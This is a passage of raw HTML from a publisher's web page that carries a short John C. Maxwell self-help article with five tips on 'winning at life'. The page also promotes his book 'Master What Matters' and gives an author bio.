8,0,0,1-.64,0ZM53.4,75.88h0v.22h0v.15h0v.08h-.07v.07l-.15.11a1.26,1.26,0,0,1-.42.34h-.11a3.78,3.78,0,0,1-1.21.08H50.5a1.31,1.31,0,0,1-.27-.19V74.18a4.35,4.35,0,0,1,0-1.14h0v-.19h0l.16-.18h.26a2.55,2.55,0,0,1,1.36.26h.15V73h.07l.08.11h.07l.27.3.11.08v.07h.08v.08h.07v.07H53v.07h0v.15h0c.06.23.13.46.19.68a3.35,3.35,0,0,1,0,1ZM57,81.57h0a2.11,2.11,0,0,1-1,0h-.07l-.42-.38V81H55.4v-.08h-.08v-.15h-.08v-.15h-.07V80.4L55,80.33v-.08h0v-.07h0V80.1l-.13-.1H54.8l-.08-.22h0V79.7h0v-.07h0v-.08h0v-.08l-.08-.07v-.08h-.07v-.08l-.08-.07V79h0v-.08h0v-.07h0l-.07-.23h-.08v-.07L54,78.4v-.07h0v-.08h0v-.07h0V78.1l-.18-.1h-.08v-.07l-.08-.08v-.07h0l-.08-.23h-.07v-.11h0c0-.22.07-.15.22-.23H54v-.07h0l.12-.15h.07l.11-.16h.08v-.08l.15-.11v-.08h.08v-.12h0l.11-.34h0V76h0v-.12h0v-.15h0v-.19a2.38,2.38,0,0,0-.12-1.32V73.8h0v-.15h0l-.08-.23h0a.21.21,0,0,1,0-.11h-.08V73.2l-.19-.15-.3-.34h0l-.08-.12h-.07v-.07h-.23v-.07H51.78a4.33,4.33,0,0,0-.72,0H49.4a6,6,0,0,1-1.58,0H47.4c-.09,0-.39,0-.45.08v.07h0v.15h0c.08.25.44.17.68.27h.11l.23.08v.07H48l.15.19h.08v.07h.07v.08h0v.11a6.38,6.38,0,0,1,.11,1.85v4.15a8.78,8.78,0,0,1-.07,2.11h0v.15h-.07l-.15.19h-.08A.27.27,0,0,1,48,82h-.37l-.12.07a1.5,1.5,0,0,0,0,.3,2.41,2.41,0,0,0,1,0h1a3.35,3.35,0,0,1,1,0h0c.19,0,.54-.08.67,0h.42l.11-.12V82h-.07c-.17-.15-.23,0-.46-.11H51l-.22-.08H50.7c-.61-.42-.53-1.93-.53-3a4.05,4.05,0,0,1,0-1.1v-.11a2.47,2.47,0,0,1,1.32,0h.11v.07h.08l.07.12h0V78H52v.15h.08v.08l.07.08v.07h0v.08h0v.07h0v.08h0v.07h0l.08.23h0V79l1.06,2h0v.11h.08v.15l.11.08v.07h.08v.08l.19.15v.07h.07l.11.15H54l.11.15h.08v.08h.26a1.27,1.27,0,0,0,.72.12h.64l.22-.08h.16v-.08h.08a.22.22,0,0,1,.15-.08c0-.1,0-.09.08-.19h0v-.19"/><path class="centerstreetmobile-cls-1" d="M63,94.44a.43.43,0,0,0-.2-.41,1.36,1.36,0,0,0-.63-.11h-.44v1h.47a1.35,1.35,0,0,0,.49-.06.42.42,0,0,0,.31-.43Zm-.76-.85a2.23,2.23,0,0,1,.81.1.69.69,0,0,1,.46.7.62.62,0,0,1-.29.56,1.26,1.26,0,0,1-.43.13.78.78,0,0,1,.51.27.79.79,0,0,1,.16.44v.42a.33.33,0,0,0,0,.14H63V96a.7.7,0,0,0-.28-.64,1.41,1.41,0,0,0-.58-.09h-.41v1.1h-.52V93.59Zm0-.79a2.32,2.32,0,0,0-1.64.64,2.14,2.14,0,0,0-.08,3l.08.08a2.39,2.39,0,0,0,3.28,0,2.12,2.12,0,0,0,.11-3l-.11-.11a2.27,2.27,0,0,0-1.58-.64ZM65,95a2.37,2.37,0,0,1-.79,1.8,2.79,2.79,0,0,1-3.81,0,2.43,2.43,0,0,1,0-3.59,2.79,2.79,0,0,1,3.81,0A2.35,2.35,0,0,1,65,95"/></svg>
	</a>
	<meta itemprop="publisher" content="Center Street" />
		</h2>

	<ul class="site-header__social">
		<li class="site-header__social-header">
			<a href="https://www.hachettebookgroup.com/newsletters/">Newsletter</a>
		</li>
		<li class="site-header__social-list-item">
			<a href="/preferences" aria-label="Preferences"><div class="header-button">
<svg xmlns="http://www.w3.org/2000/svg" style="width: 100%; height: 100%;" viewBox="0 0 512 512"><!--! Font Awesome Pro 6.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M495.9 166.6C499.2 175.2 496.4 184.9 489.6 191.2L446.3 230.6C447.4 238.9 448 247.4 448 256C448 264.6 447.4 273.1 446.3 281.4L489.6 320.8C496.4 327.1 499.2 336.8 495.9 345.4C491.5 357.3 486.2 368.8 480.2 379.7L475.5 387.8C468.9 398.8 461.5 409.2 453.4 419.1C447.4 426.2 437.7 428.7 428.9 425.9L373.2 408.1C359.8 418.4 344.1 427 329.2 433.6L316.7 490.7C314.7 499.7 307.7 506.1 298.5 508.5C284.7 510.8 270.5 512 255.1 512C241.5 512 227.3 510.8 213.5 508.5C204.3 506.1 197.3 499.7 195.3 490.7L182.8 433.6C167 427 152.2 418.4 138.8 408.1L83.14 425.9C74.3 428.7 64.55 426.2 58.63 419.1C50.52 409.2 43.12 398.8 36.52 387.8L31.84 379.7C25.77 368.8 20.49 357.3 16.06 345.4C12.82 336.8 15.55 327.1 22.41 320.8L65.67 281.4C64.57 273.1 64 264.6 64 256C64 247.4 64.57 238.9 65.67 230.6L22.41 191.2C15.55 184.9 12.82 175.3 16.06 166.6C20.49 154.7 25.78 143.2 31.84 132.3L36.51 124.2C43.12 113.2 50.52 102.8 58.63 92.95C64.55 85.8 74.3 83.32 83.14 86.14L138.8 103.9C152.2 93.56 167 84.96 182.8 78.43L195.3 21.33C197.3 12.25 204.3 5.04 213.5 3.51C227.3 1.201 241.5 0 256 0C270.5 0 284.7 1.201 298.5 3.51C307.7 5.04 314.7 12.25 316.7 21.33L329.2 78.43C344.1 84.96 359.8 93.56 373.2 103.9L428.9 86.14C437.7 83.32 447.4 85.8 453.4 92.95C461.5 102.8 468.9 113.2 475.5 124.2L480.2 132.3C486.2 143.2 491.5 154.7 495.9 166.6V166.6zM256 336C300.2 336 336 300.2 336 255.1C336 211.8 300.2 175.1 256 175.1C211.8 175.1 176 211.8 176 255.1C176 300.2 211.8 336 256 336z"/></svg>
</div></a>
		</li>
			</ul>
	<div class="mobile-search">
		
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.centerstreet.com/">
		<label class="site-search__label" for="search-form-63924322d1e12">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-63924322d1e12" value="" placeholder="Search" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-997397000  desc-search-icon-3401303581">
	<title id="title-search-icon-997397000">Search</title>
	<desc id="desc-search-icon-3401303581">magnifying glass graphic</desc>
	<path d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
	</div>
</div>
<div class="site-header__default site-header__nav-search-container">
	<div class="menu-center-street-container"><nav class="site-header__nav"><ul id="menu-center-street" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Home">HBG Home</a></span></li></ul></nav></div>	
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.centerstreet.com/">
		<label class="site-search__label" for="search-form-63924322d26aa">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-63924322d26aa" value="" placeholder="Search" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-1469570213  desc-search-icon-3011273965">
	<title id="title-search-icon-1469570213">Search</title>
	<desc id="desc-search-icon-3011273965">magnifying glass graphic</desc>
	<path d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
</div>
</header>

<!-- Popup Modal -->
<div class="modal-popup modal-site-popup modal-imprint-popup modal fade" id="newsletter_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
  <div class="modal-dialog" role="document">
	<div class="modal-content">
	  <div class="modal-header">
		<button type="button" class="modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		<h4 class="modal-title"></h4>
	  </div>
			<div class="signup module">
	<div class="module__content">
	<div class="signup__content">
		<p class="newsletter-text">Don’t miss news from Center Street</p>
		<div class="signup__form-wrapper">
			<form class="signup__form">
				<label for="email_address_input" class="screen-reader-text">Don’t miss news from Center Street</label>
				<input id="email_address_input" type="email" name="email_address" class="hachette-input hachette-email" placeholder="Your email address" />
									<input type="hidden" name="list_id" class="hachette-input" value="e3063deec2" />
												<button class="newsletter-submit"
					data-type="click-event" data-category="Form Newsletter" data-action="Submit Form" data-label="Submit Newsletter"
				>
					SIGN UP				</button>
			</form>
		</div>
	</div>
		<p class="signup__legal">
			By clicking ‘Sign Up,’ I acknowledge that I have read and agree to Hachette Book Group’s 			<a href="https://www.centerstreet.com/terms-and-policies/privacy-policy/">Privacy Policy</a>
			 and 			<a href="https://www.centerstreet.com/terms-and-policies/terms-of-use/">Terms of Use</a>
		</p>
	</div>
</div>
	</div>
  </div>
</div>

<!-- Cart -->
<section class="drawer" id="flyout-cart" data-drawer-target aria-expanded="false">
	<div class="drawer__overlay" data-drawer-close tabindex="-1"></div>
	<div class="drawer__wrapper">
			<div class="drawer__header">
					<div class="drawer__title"><h2>Shopping Cart</h2></div>
					<button class="drawer__close" data-drawer-close aria-label="Close Cart">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><!--! Font Awesome Pro 6.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M310.6 361.4c12.5 12.5 12.5 32.75 0 45.25C304.4 412.9 296.2 416 288 416s-16.38-3.125-22.62-9.375L160 301.3L54.63 406.6C48.38 412.9 40.19 416 32 416S15.63 412.9 9.375 406.6c-12.5-12.5-12.5-32.75 0-45.25l105.4-105.4L9.375 150.6c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L160 210.8l105.4-105.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-105.4 105.4L310.6 361.4z"/></svg>
</button>
			</div>
			<div class="drawer__content">
				<div id="shopping-cart-component" class="shopping-cart-component"></div>
			</div>
	</div>
</section>
			<div id="content" class="site__content wp-blocks">
				
<main class="">
	<article class="article-content__wrapper">
		<div class="article-content__main-body">
			<header class="post__header">
				<h1>5 Ways to Win at Life from John C. Maxwell</h1>
			</header>

			
							<header class="post__meta">
					<span class="post__byline">
						John C. Maxwell					</span>
				</header>
			
				<div class="post__content">
					


<figure class="wp-block-image alignfull size-full"><img decoding="async" width="2400" height="668" src="https://i0.wp.com/www.hachettebookgroup.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?resize=2400%2C668&#038;ssl=1" alt="" class="wp-image-1289069" srcset="https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=2400 2400w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=300 300w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=768 768w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=1024 1024w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=1536 1536w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=2048 2048w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=450 450w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=480 480w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=190 190w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=160 160w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=180 180w, https://www.centerstreet.com/wp-content/uploads/2022/12/CSBlogHeaders-MssterWhatMatters.png?w=200 200w" sizes="(max-width: 1000px) 100vw, 1000px" data-recalc-dims="1" /></figure>



<div style="height:15px" aria-hidden="true" class="wp-block-spacer"></div>



<p>How do you define winning at life? Is it having a lot of money? Is it being famous? Or is it growing into your greatest potential and purpose? John Maxwell is here to help you figure out what success means to you and how you can reach whatever goals you’re trying to meet.. </p>



<div class="is-layout-flow wp-block-group"><div class="wp-block-group__inner-container"></div></div>



<h2>1. Focus on today. </h2>



<p>Today is the only time you have. It’s too late for yesterday. And you can’t depend on tomorrow. Hoping for a good future without investing in today is like a farmer waiting for a crop without ever planting any seed. The secret of your success is determined by your daily agenda.</p>



<h2>2. View everyone as a potential friend.</h2>



<p>When you understand that being connected to others is one of life’s greatest joys, then you realize that the best of life comes when you initiate and invest in good relationships. At the end of each day, ask yourself, “Have I been thoughtful toward people today? Have I treated others as potential friends?” If the answers are yes, then you’ve done your part.</p>



<h2>3. Put important ahead of urgent. </h2>



<p>Since you can’t change time, you must instead change your approach to it. Most people are driven by the urgent, by whatever comes up next. To win at life, you can’t do that. Excellence comes from doing the right things right, the important things before the urgent ones. The rest you have to let go of.</p>



<h2>4. Give your family your best.  </h2>



<p>You have no control over the past or how you were treated. But you determine how <em>you</em> treat <em>your</em> family today and in the future. The way you approach family life has a profound impact on how you live and on the legacy you leave. Do you want to change the world and make it a better place? Good. Start by going home and loving your own family. Let change begin there.</p>



<h2>5. Make yourself better every day.  </h2>



<p>Personal growth changes you from the inside out. When you improve your career skills, you become better equipped to face challenges. When you learn new emotional and relational skills, you are able to work through relational issues. When you develop habits and disciplines related to eating and exercise, your health and fitness improve. Make it your goal to grow in some way every day!</p>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>



<p>To learn more about how you can make the most of your day and win at life, read <mark style="background-color:#ffffff" class="has-inline-color has-red-6-color"><strong>Master What Matters</strong> by John C. Maxwell</mark>. Download the introduction and chapter one for free. </p>



<div class="is-content-justification-center is-layout-flex wp-container-2 wp-block-buttons">
<div class="wp-block-button"><a class="wp-block-button__link wp-element-button" href="https://www.centerstreet.com/titles/john-c-maxwell/master-what-matters/9781546002505/">Read THE INTRODUCTION and chapter 1</a></div>
</div>



<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<div style="height:50px" aria-hidden="true" class="wp-block-spacer"></div>



<div class="featured-title v2" id="title-9781546002505">
	<div class="featured-title__cover">
		<a href="https://www.centerstreet.com/titles/john-c-maxwell/master-what-matters/9781546002505/" alt="Master What Matters">
			<img decoding="async" width="190" height="190" src="" class="lazyload orientation-square" alt="Master What Matters" loading="lazy" data-src="https://www.centerstreet.com/wp-content/uploads/2022/09/9781546002505.jpg?fit=190%2C190" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.centerstreet.com/titles/john-c-maxwell/master-what-matters/9781546002505/" alt="Master What Matters">
							Master What Matters						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.centerstreet.com/contributor/john-c-maxwell/" class="title-header__author"><span>John C. Maxwell</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><P><B>Move past what used to be, stop day-dreaming about what could be, and make the most of today with the fourteen values that help leaders win at life.&#160;&#160;</B></P> The choices you make every day based on your values are what define you. And define your life. Make the right ones, and you <I>are </I>a winner. And here&rsquo;s the good news: they&rsquo;re not rocket science. Anyone can make them. Internationally bestselling author and leadership expert John C. Maxwell shares twelve everyday choices that you can make today and every day. They will help you master what matters so that you can have a better life.<BR /><BR /><B>About Maxwell Moments</B><BR /> Maxwell Moments is an innovative new line of derivative books unlike any other Maxwell books in the marketplace. They will look and feel fresh, appealing to a younger and more innovative audience while delivering the time-tested Maxwell message of hope, personal growth, leadership development, and success.<BR /> &#160;<BR /> Titles in the Maxwell Moments series will be single-concept books in a creative format, chock full of wisdom, insight, and inspiration. Each will contain the essence of one of John&rsquo;s messages, divided into short chapters to be savored in small bites, read in a single sitting, given as gifts, and used as mentoring tools.</p>
				</div>
					</div>

		
<div class="title-header__price-container">
	<div class="title-header__price-desktop">
		
<div class="title-header__meta-line">
			<p>
			<span itemprop="price" class="title-header__meta-price hbg-price__usd ">
								<span class="title-header__meta-price-original">
					<span class="sr-only">Regular Price</span>
					$15.99									</span>

			</span>
		</p>

			<p>
			<span itemprop="price" class="title-header__meta-price  hbg-price__cad">
								<span class="title-header__meta-price-original">
					<span class="sr-only">Regular Price</span>
					$21.99 CAD									</span>

			</span>
		</p>

	</div>
	</div>

	<div class="title-header__cart-buttons-desktop">
			</div>
</div>


<p class="v2-button-cta ecommerce-buy-direct-cta">Also Available From:</p>
<p class="v2-button-cta ecommerce-buy-others-cta">Buy Now:</p>
<div class="title-header__buy-links--container align-flex-start">
			<a class="title-header__buy-links--button"
				target="_blank"
				href="http://www.amazon.com/gp/product/1546002502?tag=hacboogrosit-20"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Amazon"
			>Amazon		</a>
			<a class="title-header__buy-links--button"
				target="_blank"
				href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781546002505"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Barnes &amp; Noble"
			>Barnes &amp; Noble		</a>
			<a class="title-header__buy-links--button"
				target="_blank"
				href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781546002505"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Books-A-Million"
			>Books-A-Million		</a>
			<a class="title-header__buy-links--button"
				target="_blank"
				href="http://www.indiebound.org/book/9781546002505"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Indiebound"
			>Indiebound		</a>
			<a class="title-header__buy-links--button"
				target="_blank"
				href="https://bookshop.org/a/2344/9781546002505"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Bookshop"
			>Bookshop		</a>
			<a class="title-header__buy-links--button"
				target="_blank"
				href="http://www.target.com/s?searchTerm=9781546002505"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Target"
			>Target		</a>
			<a class="title-header__buy-links--button"
				target="_blank"
				href="http://www.walmart.com/search/search-ng.do?q=9781546002505"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Walmart"
			>Walmart		</a>
	</div>
		</div>
</div>



<div class="meet-the-author module module--fixed">
	<div class="module__content meet-the-author__inner module--fixed">
		<div class="meet-the-author__image">
			<a href="https://www.centerstreet.com/contributor/john-c-maxwell/">
									<img decoding="async" width="420" height="580" src="" class="lazyload orientation-portrait" alt="" loading="lazy" data-src="https://www.centerstreet.com/wp-content/uploads/2021/11/Maxwell_Author.jpg?resize=420%2C580" />							</a>
		</div>
		<div class="meet-the-author__content">
			<div class="meet-the-author__body">
				<a href="https://www.centerstreet.com/contributor/john-c-maxwell/">
					<h2>
						Meet The Author: <span>John C. Maxwell</span>
					</h2>
				</a>
				<p>
					<p>John C. Maxwell is a #1 <i>New York Times</i> bestselling author, coach, and speaker who has sold more than 24 million books in fifty languages. Often called America’s #1 leadership authority, Maxwell was identified as the most popular leadership expert in the world by <i>Inc. </i>magazine in 2014, and he has been voted the top leadership professional six years in a row on LeadershipGurus.net. He is the founder of The John Maxwell Company, The John Maxwell Team, and EQUIP, a non-profit organization that has trained more than 5 million leaders in 180 countries. Each year Maxwell speaks to <i>Fortune </i>500 companies, presidents of nations, and many of the world’s top business leaders.</p>
									<div class="contributor-header__share swappable featured-author__share">
					<ul class="site__share">
						
													<li class="share-twitter">
								<a href="https://twitter.com/JohnCMaxwell" target="_blank"
								   data-type="link-event" data-category="Social Share" data-action="Contributor" data-label="Twitter"
								>
									
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 64 51.94" role="img" aria-labelledby="title-alt-twitter-icon-367374887  desc-alt-twitter-icon-2626502797">
	<title id="title-alt-twitter-icon-367374887">Twitter Alt Icon</title>
	<desc id="desc-alt-twitter-icon-2626502797">Icon only circular Twitter logo</desc>
	<path role="presentation" class="cls-2" d="M56.57,8.18v0a6.24,6.24,0,0,0,1.44-1A13.13,13.13,0,0,0,62.27,1l-1.63.89a21.28,21.28,0,0,1-6.73,2.27C51.32,1.77,48.62-.09,43.53,0L41.93.2A15.94,15.94,0,0,0,39,1.09,13,13,0,0,0,31.58,9.9a12.2,12.2,0,0,0-.06,6.16,25.08,25.08,0,0,1-5.89-.77,38.64,38.64,0,0,1-16-7.76A24,24,0,0,1,5.67,3.81,8,8,0,0,1,4.49,2.43l-.06,0A15.21,15.21,0,0,0,3,5.82,13.41,13.41,0,0,0,6,17.73c.66.83,1.74,1.34,2.4,2.11h.06a4,4,0,0,1-1.79-.16,14.44,14.44,0,0,1-2.76-.77l-1.35-.64A12.63,12.63,0,0,0,8.71,29.51,9.59,9.59,0,0,0,13,31.24c-.87.73-4.57.4-5.86.26,1.61,4.14,4.08,6.9,8.33,8.4a11.15,11.15,0,0,0,3.91.7,14.6,14.6,0,0,1-3.56,2.33,26.9,26.9,0,0,1-7.88,2.84c-1.19.26-2.46.21-3.75.41A21.44,21.44,0,0,1,0,46l1.15.7a30.83,30.83,0,0,0,3.72,1.92,47.89,47.89,0,0,0,7.72,2.52c5.66,1.4,13.64.77,18.58-.77,13.75-4.29,22.44-14.29,25.72-29a37.62,37.62,0,0,0,.61-8.43l2-1.63A21.21,21.21,0,0,0,64,6.2v0C61.77,6.87,59.42,8.15,56.57,8.18Z" transform="translate(0)"/></svg>
								</a>
							</li>
						
													<li class="share-website">
								<a href="http://www.johnmaxwell.com/" target="_blank"
								   data-type="link-event" data-category="Social Share" data-action="Contributor" data-label="Website"
								>
									
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.8 38.8" role="img" aria-labelledby="title-website-icon-2869343146  desc-website-icon-1176305257">
	<title id="title-website-icon-2869343146">Website Icon</title>
	<desc id="desc-website-icon-1176305257">White globe over gray background</desc>
	<path role="presentation" class="cls-1" d="M19.4,0C8.7,0,0,8.7,0,19.4s8.7,19.4,19.4,19.4c10.7,0,19.4-8.7,19.4-19.4C38.8,8.7,30.1,0,19.4,0C19.4,0,19.4,0,19.4,0z
	 M21.2,34.5C21,34.3,21,34.1,21,33.9v-5.8c-1.2-0.3-2.1-0.9-2.9-1.8S17,24.2,17,23c0-0.4,0-0.8,0.1-1.2H17c-1.6,0-3.1-0.4-4.4-1.2
	s-2.4-1.9-3.2-3.2C8.6,16,8.2,14.6,8.2,13c0-2.7,1-4.8,3.1-6.4s4.8-2.4,8.2-2.5c0.7,0,1.6,0.1,2.6,0.2c0.2,0,0.4,0.1,0.5,0.3
	s0.2,0.3,0.2,0.5c0,2.4-0.5,4.5-1.5,6.3c0.3,0.3,0.6,0.6,0.8,0.8s0.4,0.5,0.5,1s0.3,0.9,0.3,1.4c0,0.4-0.2,0.8-0.5,1.1
	s-0.7,0.5-1.2,0.5c-0.3,0-0.5-0.1-0.7-0.3s-0.4-0.4-0.5-0.5s-0.4-0.4-0.6-0.5c-0.3-0.2-0.6-0.3-1-0.3c-0.6,0-1,0.2-1.4,0.6
	s-0.6,0.9-0.6,1.4c0,0.8,0.4,1.5,1.1,2s1.7,0.8,2.9,0.8h3.2c1.6,0,2.9,0.5,4,1.6s1.6,2.4,1.6,4c0,1.3-0.3,2.6-0.8,3.9
	s-1.2,2.3-1.9,3.1c-0.8,0.8-1.6,1.5-2.4,2s-1.5,0.7-2.2,0.7C21.6,34.7,21.4,34.6,21.2,34.5z" transform="translate(0 0)"/></svg>
								</a>
							</li>
						
						
						
						
						
						
						
						
											</ul>
				</div>
								<a class="meet-the-author__discover" href="https://www.centerstreet.com/contributor/john-c-maxwell/">Discover More</a>
				</p>
			</div>
					</div>
	</div>
</div>
				</div>
		</div>

			<!-- Add sidebar if sidebar content -->
				</article>
</main>

<div class="hbg-after-main-content">
	</div>
				
<footer class="site-footer">
	<div class="site-footer__logo">
		
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-ini-2099623652  desc-hachette-logo-ini-309511009">
<title id="title-hachette-logo-ini-2099623652">Hachette Logo</title>
<desc id="desc-hachette-logo-ini-309511009">Large H Initial</desc>
<polygon role="presentation" class="initial-logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
<polygon role="presentation" class="initial-logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
	</div>
			<ul class="site-footer__social">
							<li class="site-footer__social-list-item">
					<a href="https://www.facebook.com/centerstreetbooks" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Facebook"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-2830478060  desc-facebook-icon-1711592830">
	<title id="title-facebook-icon-2830478060">Facebook Icon</title>
	<desc id="desc-facebook-icon-1711592830">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://twitter.com/centerstreet" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Twitter"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-1874005091  desc-twitter-icon-3796812597">
	<title id="title-twitter-icon-1874005091">Twitter Icon</title>
	<desc id="desc-twitter-icon-3796812597">Twitter Logo</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://instagram.com/CenterStreetBooks" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Instagram"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-ig-icon-482576424  desc-ig-icon-655398172">
	<title id="title-ig-icon-482576424">Instagram Icon</title>
	<desc id="desc-ig-icon-655398172">Instagram Icon</desc>
	<rect role="presentation" class="cls-1" x="23.01" y="11.86" width="3.88" height="3.88" rx="0.97" ry="0.97"/>
	<path role="presentation" class="cls-1" d="M25.31,19.37a5.94,5.94,0,1,1-11.66-1.58H11.86v8.12a1,1,0,0,0,1,1H25.92a1,1,0,0,0,1-1V17.79H25.1A5.94,5.94,0,0,1,25.31,19.37Z" transform="translate(0 0)"/>
